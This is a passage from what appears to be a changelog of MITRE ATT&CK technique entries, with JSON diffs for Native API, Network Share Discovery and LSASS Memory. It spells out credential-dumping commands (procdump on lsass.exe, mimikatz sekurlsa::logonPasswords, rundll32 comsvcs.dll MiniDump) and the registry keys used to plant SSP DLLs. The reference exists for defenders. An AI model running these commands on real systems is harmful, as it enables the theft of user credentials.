\"Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.\", \"old_value\": \"Apple. (n.d.). Foundation. Retrieved July 1, 2020.\"}, \"root['external_references'][11]['url']\": {\"new_value\": \"https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework\", \"old_value\": \"https://developer.apple.com/documentation/foundation\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \\n\\nUtilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. \", \"old_value\": \"Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \\n\\nUtilization of the Windows API may involve processes loading/accessing system DLLs associated with providing called functions (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. \", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n-Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \\n+Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \\n \\n-Utilization of the Windows API may involve processes loading/accessing system DLLs associated with providing called functions (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. \\n+Utilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. \"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['external_references'][12]\": {\"source_name\": \"Apple Core Services\", \"description\": \"Apple. (n.d.). Core Services. Retrieved June 25, 2020.\", \"url\": \"https://developer.apple.com/documentation/coreservices\"}, \"root['external_references'][13]\": {\"source_name\": \"MACOS Cocoa\", \"description\": \"Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.\", \"url\": \"https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1\"}, \"root['external_references'][14]\": {\"source_name\": \"macOS Foundation\", \"description\": \"Apple. (n.d.). Foundation. Retrieved July 1, 2020.\", \"url\": \"https://developer.apple.com/documentation/foundation\"}, \"root['x_mitre_contributors'][0]\": \"Gordon Long, Box, Inc., @ethicalhax\"}}",
"previous_version": "2.0",
"version_change": "2.0 \u2192 2.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may directly interact with the native OS applica | t | 1 | Adversaries may interact with the native OS application prog |
| > | tion programming interface (API) to execute behaviors. Nativ | > | ramming interface (API) to execute behaviors. Native APIs pr | ||
| > | e APIs provide a controlled means of calling low-level OS se | > | ovide a controlled means of calling low-level OS services wi | ||
| > | rvices within the kernel, such as those involving hardware/d | > | thin the kernel, such as those involving hardware/devices, m | ||
| > | evices, memory, and processes.(Citation: NT API Windows)(Cit | > | emory, and processes.(Citation: NT API Windows)(Citation: Li | ||
| > | ation: Linux Kernel API) These native APIs are leveraged by | > | nux Kernel API) These native APIs are leveraged by the OS du | ||
| > | the OS during system boot (when other system components are | > | ring system boot (when other system components are not yet i | ||
| > | not yet initialized) as well as carrying out tasks and reque | > | nitialized) as well as carrying out tasks and requests durin | ||
| > | sts during routine operations. Functionality provided by na | > | g routine operations. Native API functions (such as <code>N | ||
| > | tive APIs are often also exposed to user-mode applications v | > | tCreateProcess</code>) may be directed invoked via system ca | ||
| > | ia interfaces and libraries. For example, functions such as | > | lls / syscalls, but these features are also often exposed to | ||
| > | the Windows API <code>CreateProcess()</code> or GNU <code>fo | > | user-mode applications via interfaces and libraries. (Citat | ||
| > | rk()</code> will allow programs and scripts to start other p | > | ion: OutFlank System Calls)(Citation: CyberBit System Calls) | ||
| > | rocesses.(Citation: Microsoft CreateProcess)(Citation: GNU F | > | (Citation: MDSec System Calls) For example, functions such a | ||
| > | ork) This may allow API callers to execute a binary, run a C | > | s the Windows API <code>CreateProcess()</code> or GNU <code> | ||
| > | LI command, load modules, etc. as thousands of similar API f | > | fork()</code> will allow programs and scripts to start other | ||
| > | unctions exist for various system operations.(Citation: Micr | > | processes.(Citation: Microsoft CreateProcess)(Citation: GNU | ||
| > | osoft Win32)(Citation: LIBC)(Citation: GLIBC) Higher level | > | Fork) This may allow API callers to execute a binary, run a | ||
| > | software frameworks, such as Microsoft .NET and macOS Cocoa, | > | CLI command, load modules, etc. as thousands of similar API | ||
| > | are also available to interact with native APIs. These fram | > | functions exist for various system operations.(Citation: Mi | ||
| > | eworks typically provide language wrappers/abstractions to A | > | crosoft Win32)(Citation: LIBC)(Citation: GLIBC) Higher leve | ||
| > | PI functionalities and are designed for ease-of-use/portabil | > | l software frameworks, such as Microsoft .NET and macOS Coco | ||
| > | ity of code.(Citation: Microsoft NET)(Citation: Apple Core S | > | a, are also available to interact with native APIs. These fr | ||
| > | ervices)(Citation: MACOS Cocoa)(Citation: macOS Foundation) | > | ameworks typically provide language wrappers/abstractions to | ||
| > | Adversaries may abuse these native API functions as a means | > | API functionalities and are designed for ease-of-use/portab | ||
| > | of executing behaviors. Similar to [Command and Scripting I | > | ility of code.(Citation: Microsoft NET)(Citation: Apple Core | ||
| > | nterpreter](https://attack.mitre.org/techniques/T1059), the | > | Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation | ||
| > | native API and its hierarchy of interfaces, provide mechanis | > | ) Adversaries may abuse these OS API functions as a means o | ||
| > | ms to interact with and utilize various components of a vict | > | f executing behaviors. Similar to [Command and Scripting Int | ||
| > | imized system. | > | erpreter](https://attack.mitre.org/techniques/T1059), the na | ||
| > | tive API and its hierarchy of interfaces provide mechanisms | ||||
| > | to interact with and utilize various components of a victimi | ||||
| > | zed system. While invoking API functions, adversaries may al | ||||
| > | so attempt to bypass defensive tools (ex: unhooking monitore | ||||
| > | d functions via [Disable or Modify Tools](https://attack.mit | ||||
| > | re.org/techniques/T1562/001)). |
net view \\\\\\\\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1135",
"external_id": "T1135"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/643.html",
"external_id": "CAPEC-643"
},
{
"source_name": "Wikipedia Shared Resource",
"description": "Wikipedia. (2017, April 15). Shared resource. Retrieved June 30, 2017.",
"url": "https://en.wikipedia.org/wiki/Shared_resource"
},
{
"source_name": "TechNet Shared Folder",
"description": "Microsoft. (n.d.). Share a Folder or Drive. Retrieved June 30, 2017.",
"url": "https://technet.microsoft.com/library/cc770880.aspx"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Praetorian"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"Process: OS API Execution"
],
"x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User"
],
"x_mitre_platforms": [
"macOS",
"Windows",
"Linux"
],
"x_mitre_version": "3.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-13 18:10:57.185000+00:00\", \"old_value\": \"2020-12-29 19:07:11.154000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \\n\\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\\\\\\\\\\\\\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.\", \"old_value\": \"Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \\n\\nFile sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\\\\\\\\\\\\\remotesystem command. It can also be used to query shared drives on the local system using net share.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. \\n \\n-File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\\\\\\\\\\\\\remotesystem command. It can also be used to query shared drives on the local system using net share.\\n+File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the net view \\\\\\\\\\\\\\\\remotesystem command. It can also be used to query shared drives on the local system using net share. For macOS, the sharing -l command lists all shared points used for smb services.\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.1\", \"old_value\": \"3.0\"}}}",
"previous_version": "3.0",
"version_change": "3.0 \u2192 3.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may look for folders and drives shared on remote | t | 1 | Adversaries may look for folders and drives shared on remote |
| > | systems as a means of identifying sources of information to | > | systems as a means of identifying sources of information to | ||
| > | gather as a precursor for Collection and to identify potent | > | gather as a precursor for Collection and to identify potent | ||
| > | ial systems of interest for Lateral Movement. Networks often | > | ial systems of interest for Lateral Movement. Networks often | ||
| > | contain shared network drives and folders that enable users | > | contain shared network drives and folders that enable users | ||
| > | to access file directories on various systems across a netw | > | to access file directories on various systems across a netw | ||
| > | ork. File sharing over a Windows network occurs over the S | > | ork. File sharing over a Windows network occurs over the S | ||
| > | MB protocol. (Citation: Wikipedia Shared Resource) (Citation | > | MB protocol. (Citation: Wikipedia Shared Resource) (Citation | ||
| > | : TechNet Shared Folder) [Net](https://attack.mitre.org/soft | > | : TechNet Shared Folder) [Net](https://attack.mitre.org/soft | ||
| > | ware/S0039) can be used to query a remote system for availab | > | ware/S0039) can be used to query a remote system for availab | ||
| > | le shared drives using the <code>net view \\\\\\\\remotesystem</ | > | le shared drives using the <code>net view \\\\\\\\remotesystem</ | ||
| > | code> command. It can also be used to query shared drives on | > | code> command. It can also be used to query shared drives on | ||
| > | the local system using <code>net share</code>. | > | the local system using <code>net share</code>. For macOS, t | ||
| > | he <code>sharing -l</code> command lists all shared points u | ||||
| > | sed for smb services. |
/proc//maps , where the procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run using:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\nBuilt-in Windows tools such as comsvcs.dll can also be used:\n\n* rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)\n\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\n",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "credential-access"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1003/001",
"external_id": "T1003.001"
},
{
"source_name": "Volexity Exchange Marauder March 2021",
"description": "Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.",
"url": "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
},
{
"source_name": "Symantec Attacks Against Government Sector",
"description": "Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021.",
"url": "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf"
},
{
"source_name": "Graeber 2014",
"description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.",
"url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html"
},
{
"source_name": "TechNet Blogs Credential Protection",
"description": "Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.",
"url": "https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/"
},
{
"source_name": "Medium Detecting Attempts to Steal Passwords from Memory",
"description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.",
"url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea"
},
{
"source_name": "Powersploit",
"description": "PowerSploit. (n.d.). Retrieved December 4, 2014.",
"url": "https://github.com/mattifestation/PowerSploit"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Edward Millington",
"Ed Williams, Trustwave, SpiderLabs"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Process: Process Access",
"Command: Command Execution",
"Process: OS API Execution"
],
"x_mitre_detection": "Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"SYSTEM"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 19:55:01.368000+00:00\", \"old_value\": \"2020-06-09 20:46:00.393000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\\n\\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\\n\\nFor example, on the target host use procdump:\\n\\n* procdump -ma lsass.exe lsass_dump\\n\\nLocally, mimikatz can be run using:\\n\\n* sekurlsa::Minidump lsassdump.dmp\\n* sekurlsa::logonPasswords\\n\\nBuilt-in Windows tools such as comsvcs.dll can also be used:\\n\\n* rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)\\n\\n\\nWindows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages and HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\\n\\nThe following SSPs can be used to access credentials:\\n\\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\\n* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\\n\", \"old_value\": \"Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\\n\\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\\n\\nFor example, on the target host use procdump:\\n\\n* procdump -ma lsass.exe lsass_dump\\n\\nLocally, mimikatz can be run using:\\n\\n* sekurlsa::Minidump lsassdump.dmp\\n* sekurlsa::logonPasswords\\n\\n\\nWindows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages and HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\\n\\nThe following SSPs can be used to access credentials:\\n\\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\\n* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\\n\", \"diff\": \"--- \\n+++ \\n@@ -11,6 +11,10 @@\\n * sekurlsa::Minidump lsassdump.dmp\\n * sekurlsa::logonPasswords\\n \\n+Built-in Windows tools such as comsvcs.dll can also be used:\\n+\\n+* rundll32.exe C:\\\\Windows\\\\System32\\\\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)\\n+\\n \\n Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\Security Packages and HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\OSConfig\\\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\\n \"}, \"root['external_references'][1]['source_name']\": {\"new_value\": \"Volexity Exchange Marauder March 2021\", \"old_value\": \"Graeber 2014\"}, \"root['external_references'][1]['description']\": {\"new_value\": \"Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.\", \"old_value\": \"Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.\"}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/\", \"old_value\": \"http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html\"}, \"root['external_references'][2]['source_name']\": {\"new_value\": \"Symantec Attacks Against Government Sector\", \"old_value\": \"TechNet Blogs Credential Protection\"}, \"root['external_references'][2]['description']\": {\"new_value\": \"Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021.\", \"old_value\": \"Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf\", \"old_value\": \"https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/\"}, \"root['external_references'][3]['source_name']\": {\"new_value\": \"Graeber 2014\", \"old_value\": \"Medium Detecting Attempts to Steal Passwords from Memory\"}, \"root['external_references'][3]['description']\": {\"new_value\": \"Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.\", \"old_value\": \"French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html\", \"old_value\": \"https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea\"}, \"root['external_references'][4]['source_name']\": {\"new_value\": \"TechNet Blogs Credential Protection\", \"old_value\": \"Powersploit\"}, \"root['external_references'][4]['description']\": {\"new_value\": \"Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.\", \"old_value\": \"PowerSploit. (n.d.). Retrieved December 4, 2014.\"}, \"root['external_references'][4]['url']\": {\"new_value\": \"https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/\", \"old_value\": \"https://github.com/mattifestation/PowerSploit\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][5]\": {\"source_name\": \"Medium Detecting Attempts to Steal Passwords from Memory\", \"description\": \"French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.\", \"url\": \"https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea\"}, \"root['external_references'][6]\": {\"source_name\": \"Powersploit\", \"description\": \"PowerSploit. (n.d.). Retrieved December 4, 2014.\", \"url\": \"https://github.com/mattifestation/PowerSploit\"}, \"root['x_mitre_contributors'][0]\": \"Edward Millington\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may attempt to access credential material stored | t | 1 | Adversaries may attempt to access credential material stored |
| > | in the process memory of the Local Security Authority Subsy | > | in the process memory of the Local Security Authority Subsy | ||
| > | stem Service (LSASS). After a user logs on, the system gener | > | stem Service (LSASS). After a user logs on, the system gener | ||
| > | ates and stores a variety of credential materials in LSASS p | > | ates and stores a variety of credential materials in LSASS p | ||
| > | rocess memory. These credential materials can be harvested b | > | rocess memory. These credential materials can be harvested b | ||
| > | y an administrative user or SYSTEM and used to conduct [Late | > | y an administrative user or SYSTEM and used to conduct [Late | ||
| > | ral Movement](https://attack.mitre.org/tactics/TA0008) using | > | ral Movement](https://attack.mitre.org/tactics/TA0008) using | ||
| > | [Use Alternate Authentication Material](https://attack.mitr | > | [Use Alternate Authentication Material](https://attack.mitr | ||
| > | e.org/techniques/T1550). As well as in-memory techniques, t | > | e.org/techniques/T1550). As well as in-memory techniques, t | ||
| > | he LSASS process memory can be dumped from the target host a | > | he LSASS process memory can be dumped from the target host a | ||
| > | nd analyzed on a local system. For example, on the target h | > | nd analyzed on a local system. For example, on the target h | ||
| > | ost use procdump: * <code>procdump -ma lsass.exe lsass_dump | > | ost use procdump: * <code>procdump -ma lsass.exe lsass_dump | ||
| > | </code> Locally, mimikatz can be run using: * <code>sekurl | > | </code> Locally, mimikatz can be run using: * <code>sekurl | ||
| > | sa::Minidump lsassdump.dmp</code> * <code>sekurlsa::logonPas | > | sa::Minidump lsassdump.dmp</code> * <code>sekurlsa::logonPas | ||
| > | swords</code> Windows Security Support Provider (SSP) DLLs | > | swords</code> Built-in Windows tools such as comsvcs.dll ca | ||
| > | are loaded into LSSAS process at system start. Once loaded | > | n also be used: * <code>rundll32.exe C:\\Windows\\System32\\co | ||
| > | into the LSA, SSP DLLs have access to encrypted and plaintex | > | msvcs.dll MiniDump PID lsass.dmp full</code>(Citation: Vole | ||
| > | t passwords that are stored in Windows, such as any logged-o | > | xity Exchange Marauder March 2021)(Citation: Symantec Attack | ||
| > | n user's Domain password or smart card PINs. The SSP configu | > | s Against Government Sector) Windows Security Support Prov | ||
| > | ration is stored in two Registry keys: <code>HKLM\\SYSTEM\\Cur | > | ider (SSP) DLLs are loaded into LSSAS process at system star | ||
| > | rentControlSet\\Control\\Lsa\\Security Packages</code> and <cod | > | t. Once loaded into the LSA, SSP DLLs have access to encrypt | ||
| > | e>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Securit | > | ed and plaintext passwords that are stored in Windows, such | ||
| > | y Packages</code>. An adversary may modify these Registry ke | > | as any logged-on user's Domain password or smart card PINs. | ||
| > | ys to add new SSPs, which will be loaded the next time the s | > | The SSP configuration is stored in two Registry keys: <code> | ||
| > | ystem boots, or when the AddSecurityPackage Windows API func | > | HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages< | ||
| > | tion is called.(Citation: Graeber 2014) The following SSPs | > | /code> and <code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\O | ||
| > | can be used to access credentials: * Msv: Interactive logon | > | SConfig\\Security Packages</code>. An adversary may modify th | ||
| > | s, batch logons, and service logons are done through the MSV | > | ese Registry keys to add new SSPs, which will be loaded the | ||
| > | authentication package. * Wdigest: The Digest Authenticatio | > | next time the system boots, or when the AddSecurityPackage W | ||
| > | n protocol is designed for use with Hypertext Transfer Proto | > | indows API function is called.(Citation: Graeber 2014) The | ||
| > | col (HTTP) and Simple Authentication Security Layer (SASL) e | > | following SSPs can be used to access credentials: * Msv: In | ||
| > | xchanges.(Citation: TechNet Blogs Credential Protection) * K | > | teractive logons, batch logons, and service logons are done | ||
| > | erberos: Preferred for mutual client-server domain authentic | > | through the MSV authentication package. * Wdigest: The Diges | ||
| > | ation in Windows 2000 and later. * CredSSP: Provides SSO an | > | t Authentication protocol is designed for use with Hypertext | ||
